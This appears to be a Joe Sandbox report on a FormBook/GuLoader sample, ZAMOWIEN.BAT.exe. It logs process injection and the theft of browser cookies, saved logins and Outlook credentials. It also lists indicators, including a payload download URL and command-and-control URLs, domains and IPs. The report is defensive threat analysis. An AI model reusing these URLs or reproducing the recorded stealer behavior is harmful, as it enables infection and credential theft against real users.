            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 7252Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeThread APC queued: target process: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"Jump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040364B EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040364B

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            221
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
            Process Injection
            1
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism
            1
            Access Token Manipulation
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            312
            Process Injection
            NTDS3
            File and Directory Discovery
            Distributed Component Object ModelInput Capture4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets23
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566409 Sample: ZAMOWIEN.BAT.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 34 www.tals.xyz 2->34 36 officinadelpasso.shop 2->36 38 3 other IPs or domains 2->38 48 Suricata IDS alerts for network traffic 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 56 3 other signatures 2->56 10 ZAMOWIEN.BAT.exe 2 36 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 34->54 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 32 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->32 dropped 68 Tries to detect virtualization through RDTSC time measurements 10->68 70 Switches to a custom stack to bypass stack traces 10->70 14 ZAMOWIEN.BAT.exe 6 10->14         started        signatures6 process7 dnsIp8 44 ectasia.sa.com 103.83.194.50, 49736, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 14->44 72 Maps a DLL or memory area into another process 14->72 18 iIQnSvahHYwDQ.exe 14->18 injected signatures9 process10 signatures11 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 21 sdchange.exe 13 18->21         started        process12 signatures13 58 Tries to steal Mail credentials (via file / registry access) 21->58 60 Tries to harvest and steal browser information (history, passwords, etc) 21->60 62 Modifies the context of a thread in another process (thread injection) 21->62 64 3 other signatures 21->64 24 iIQnSvahHYwDQ.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 40 officinadelpasso.shop 195.110.124.133, 49803, 80 REGISTER-ASIT Italy 24->40 42 www.vayui.top 172.67.145.234, 49844, 49850, 49856 CLOUDFLARENETUS United States 24->42 66 Found direct / indirect Syscall (likely to bypass EDR) 24->66 signatures16

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ZAMOWIEN.BAT.exe13%ReversingLabs
            ZAMOWIEN.BAT.exe18%VirustotalBrowse
            ZAMOWIEN.BAT.exe100%AviraHEUR/AGEN.1337977
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.officinadelpasso.shop0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.vayui.top/4twy/0%Avira URL Cloudsafe
            http://ectasia.sa.com/po.binca0%Avira URL Cloudsafe
            http://ectasia.sa.com/po.binL0%Avira URL Cloudsafe
            http://ectasia.sa.com/po.bin0%Avira URL Cloudsafe
            http://www.officinadelpasso.shop/vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc0%Avira URL Cloudsafe
            http://www.vayui.top0%Avira URL Cloudsafe
            http://www.vayui.top/4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            ectasia.sa.com
            103.83.194.50
            truefalse
              unknown
              www.vayui.top
              172.67.145.234
              truefalse
                high
                officinadelpasso.shop
                195.110.124.133
                truetrue
                  unknown
                  www.tals.xyz
                  13.248.169.48
                  truefalse
                    high
                    www.officinadelpasso.shop
                    unknown
                    unknownfalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://www.vayui.top/4twy/true
                    • Avira URL Cloud: safe
                    unknown
                    http://www.officinadelpasso.shop/vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpctrue
                    • Avira URL Cloud: safe
                    unknown
                    http://ectasia.sa.com/po.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.vayui.top/4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpctrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtabsdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://ectasia.sa.com/po.bincaZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                high
                                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                                  high
                                  http://ectasia.sa.com/po.binLZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002848000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.ftp.ftp://ftp.gopher.ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://nsis.sf.net/NSIS_ErrorErrorZAMOWIEN.BAT.exefalse
                                          high
                                          https://www.ecosia.org/newtab/sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.vayui.topiIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              195.110.124.133
                                              officinadelpasso.shopItaly
                                              39729REGISTER-ASITtrue
                                              172.67.145.234
                                              www.vayui.topUnited States
                                              13335CLOUDFLARENETUSfalse
                                              103.83.194.50
                                              ectasia.sa.comUnited States
                                              132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1566409
                                              Start date and time:2024-12-02 07:08:04 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 16s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:ZAMOWIEN.BAT.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/12@4/3
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 74%
                                              • Number of executed functions: 80
                                              • Number of non-executed functions: 295
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              TimeTypeDescription
                                              01:10:48API Interceptor6x Sleep call for process: sdchange.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              195.110.124.133Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.officinadelpasso.shop/te2d/
                                              Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                              • www.elettrosistemista.zip/fo8o/
                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                              • www.nutrigenfit.online/2vhi/
                                              172.67.145.234OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vayui.top/4twy/
                                              purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.vayui.topOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.95.160
                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 172.67.145.234
                                              S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 104.21.95.160
                                              purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              www.tals.xyzBASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 13.248.169.48
                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              REGISTER-ASITCertificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 195.110.124.133
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 195.110.124.133
                                              S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 195.110.124.133
                                              Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                              • 195.110.124.133
                                              NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINhttps://www.google.rs/url?q=902CHARtTPSJ3J3wDyycT&sa=t&esrc=uoVoZFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/burakyaman.co.uk%2FNew%2FAuth%2FxLOTspdcp8PiM3iiATiEg23p/amJ1cm8xMEBlcS5lZHUuYXUGet hashmaliciousUnknownBrowse
                                              • 103.83.194.55
                                              PO_0001.vbsGet hashmaliciousGuLoaderBrowse
                                              • 103.83.194.50
                                              ORDER AND CATALOG 01.batGet hashmaliciousGuLoaderBrowse
                                              • 103.83.194.50
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 103.83.194.50
                                              Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 103.83.194.50
                                              S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 103.83.194.50
                                              https://recociese.za.com/wpcones/excel.htmlGet hashmaliciousUnknownBrowse
                                              • 103.83.194.50
                                              LPC Scanned Docs-Copyright #U00a9GNP.CPL.dllGet hashmaliciousAsyncRATBrowse
                                              • 103.83.194.50
                                              08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.htmlGet hashmaliciousUnknownBrowse
                                              • 103.83.194.55
                                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 168.81.254.150
                                              CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                              • 172.67.165.166
                                              sora.mips.elfGet hashmaliciousMiraiBrowse
                                              • 1.4.51.14
                                              sora.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 172.68.102.131
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.82.174
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              https://wixauth-processing.es/wp/vite-react-web.vercel.app.htmlGet hashmaliciousUnknownBrowse
                                              • 104.21.26.223
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                              • 172.64.41.3
                                              tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dllhttps://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                        SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                          D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                UMOWA_PD.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                                  C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dllLisectAVT_2403002A_176.exeGet hashmaliciousALLLQBrowse
                                                                    kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
